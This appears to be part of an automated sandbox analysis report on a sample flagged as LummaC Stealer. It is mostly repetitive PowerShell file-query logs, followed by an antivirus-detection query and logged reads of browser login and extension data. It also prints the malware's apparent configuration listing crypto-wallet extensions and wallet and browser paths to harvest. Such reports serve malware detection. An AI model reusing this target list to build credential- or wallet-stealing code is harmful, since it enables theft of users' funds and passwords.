Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 28_2_0789F06C CreateNamedPipeW,

28_2_0789F06C

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Lightweight.com, 00000017.00000002.2299988690.0000000000CD2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Lightweight.com, 00000017.00000002.2304957335.0000000000F35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: electrum
Source: Lightweight.com, 00000017.00000003.2279302320.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Lightweight.com, 00000017.00000003.2279302320.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Lightweight.com, 00000017.00000003.2278853392.0000000003BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: jdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":[""],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":[""],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":[""],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":[".dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":[""],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she..sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge",
Source: Lightweight.com, 00000017.00000003.2278853392.0000000003BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: jdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":[""],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":[""],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":[""],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":[".dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":[""],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she..sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge",
Source: Lightweight.com, 00000017.00000002.2304957335.0000000000F35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: Lightweight.com, 00000017.00000002.2304957335.0000000000F35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ethereum
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SerializeOrConvert( KeyProp, KeyPropertyTag, KeysToRemoveArray.EnterElement(), TempKeyValueStorage, DefaultsStruct)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
